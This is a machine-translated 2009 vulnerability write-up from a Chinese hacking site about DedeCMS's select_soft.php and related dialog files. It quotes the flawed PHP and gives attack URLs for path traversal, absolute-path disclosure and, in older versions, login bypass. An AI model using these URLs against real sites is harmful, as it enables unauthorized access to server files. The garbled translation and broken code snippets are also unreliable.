DEDECMS XDAY-vulnerability warning-the black bar safety net

ID MYHACK58:62200224212
Type myhack58
Reporter 佚名
Modified 2009-08-09T00:00:00


Author: st0p In this record look, Hey, this hole but Jack crash two found. Quite a YD., but also to help me find the two ROOT privileges.。 This vulnerability to st0p and Jack found that copyright did not, welcome to reprint! Why call XDAY not called 0DAY, because this hole relatively chaotic, the cover version more, but less useful, quite tasteless, but the use of better or a little effect..

Being bored when found YD Jack sent a message, saying he found DEDECMS a very tasteless things, include/dialog/select_soft. php files can be broke DEDECMS background, the previous owner of the present can skip the login authentication direct access, no need the administrator account, the new version of it directly to the background. See the message after my head on with a YD idea, the will official is also present, 然后马上打开 unfortunately the official will prompt you to enter the post-processing directory, not the steering. As shown in Figure 1 ! dedecms-xday1 Disappointed Ah, but in and Jack chat in learned safety in China have this problem, 于是打开 really turned, as shown in Figure 2 ! dedecms-xday2 See, the background of the address is article_6565998um9)-_the title bar is delphi V53_1_GBK, DELPHI into Chapter system. Below to go to there weave a dream pictures。。。。 If there is, hurry to go to the official download of the latest DedeCMS V5. 5 The official version, DedeCMS V5. 3. 1 and DedeCmsV5. 1FreeSP1 the three versions, and then a local set up, respectively, of the select_soft. php file analysis a bit, so I found something more interesting. First let's look at DedeCmsV5. 1FreeSP1 this version., the key code is as follows include/dialog/select_soft.php


1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0


<? php require_once(dirname(FILE)."/ config.php");//this detects whether you have logged in

if(empty($activepath)) $activepath = "";

$activepath = str_replace("..","",$activepath); //filter out..but no filter. $activepath = ereg_replace("^/{1,}","/",$activepath); if(strlen($activepath)<strlen($cfg_soft_dir)){ $activepath = $cfg_soft_dir; } //If the path value is less than the length set of$cfg_soft_dir the length of the value then the$activepath equal to$cfg_soft_dir, the system default is/uploads/soft //Pay attention here, if this value is greater than$cfg_soft_dir value of the length of time it will jump over,$cfg_soft_dir存在于include/config_base.php

$inpath = $cfg_basedir.$ activepath; $activeurl = "..".$ activepath; if(empty($f)) $f="form1. enclosure";

if(empty($comeback)) $comeback = "";




1 2 3 4 5 6 7 8 9 1 0 1 1 1 2


//Test user login status $cuserLogin = new 'userLogin' (); if($cuserLogin->getUserID()==-1) { if($cuserLogin->adminDir==") { exit('Request Error!'); } $gurl = "../../{$cuserLogin->adminDir}/login. php? gotopage=". urlencode($dedeNowurl); echo "<script language='javascript'>location='$gurl';</script>";//quack, look here, detects if no landing will turn our cute background landing address. exit(); }


Although DEDECMS provided to modify the background of the directory function, but because the include/dialog/config. php problem, or will it burst the backstage management path. Then look at the other interesting places by viewing the include/dialog/select_soft. php source code, we see/no filter, then we directly construct activepath = a/aaa see, due to the following detection of the length of the present, will be replaced/uploads/soft, out of failure, some friends may think of going directly to constitute a more than$cfg_soft_dir the length of the long value on the line, such as/include/FCKeditor, that is to be accessed. Our visit to http://target. com/include/dialog/select_soft. php? activepath=/include/FCKeditor As shown in Figure 3 ! dedecms-xday3 See, the jump is successful, but this, to us, useless. in. That can jump to the root directory. After st0p the try to find this version of Is can jump a success. Filtered out..but no filter., the But the following detection$activepath length. Less than this length, you hetero jump would have been in/uploads/soft directory below, then we add N./ Try Results in addition to/././././././././ When successful skip Our visit to http://target. com/include/dialog/select_soft. php? activepath=/././././././././ As shown in Figure 4 ! dedecms-xday4 See, direct is listed under the root directory of all files, and PHP files, but cannot view the content. Moreover DEDECMS in Access does not exist in the directory when the error message, we can also construct a length greater than the$cfg_soft_dir any directory, so he broke the absolute path. Such as visit http://target. com/include/dialog/select_soft. php? activepath=/st0pst0pst0pst0pst0pst0pst0pst0p The results are shown in Figure 5 ! dedecms-xday5

Then looked at the DedeCMS V5. 3. 1 and the latest DedeCMS V5. 5 The official version, and found that the two versions of the. Been processed, and will only list directories and some allows the display of the file, PHP is not displayed. include/dialog/select_soft.php

1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8


<? php require_once(dirname(FILE)."/ config.php");//this detects whether you have logged in if(empty($activepath)) { $activepath = "; } $activepath = str_replace('.',",$ activepath);//see?, here the filter..into the filter.

$activepath = ereg_replace("/{1,}",'/',$activepath);

if(strlen($activepath) < strlen($cfg_soft_dir)) { $activepath = $cfg_soft_dir; } //But this by the length to detect the place of no filter, Hey Hey we can still use the $inpath = $cfg_basedir.$ activepath; $activeurl = '..'.$ activepath; if(empty($f)) { $f='form1. enclosure'; }

if(empty($comeback)) { $comeback = "; }



As construction http://target. com/include/dialog/select_soft. php? activepath=/st0pst0pst0pst0pst0pst0pst0pst0p can burst absolute path Construct http://target. com/include/dialog/select_soft. php? activepath=/include/FCKeditor can browse to this directory under the file, of course you can also jump to another directory, but the length must be greater than settings in the directory. But the premise is you have to login to use, this will seem a bit tasteless. Jack says If in the explosion of an injection vulnerability. GA.... and

In addition to some low version of DEDECMS access this page directly skip the login authentication is displayed directly, and can also be used/././././././././ Off to the root directory to go to. However, these versions of the access address is somewhat different. The address is http://target. com/The require/dialog/select_soft. php? activepath=/././././././././

Hey Hey, finally found include\dialog\directory and several other files are there the same problems, just the default set of directory is different. Some can view the HTML of these files. in. There is the same problem with the file there include\dialog\select_images.php include\dialog\select_media.php include\dialog\select_templets.php